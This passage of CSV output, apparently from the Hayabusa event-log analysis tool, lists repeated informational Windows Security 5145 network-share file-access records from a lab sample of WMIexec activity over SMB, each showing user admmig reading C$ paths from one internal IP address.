10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 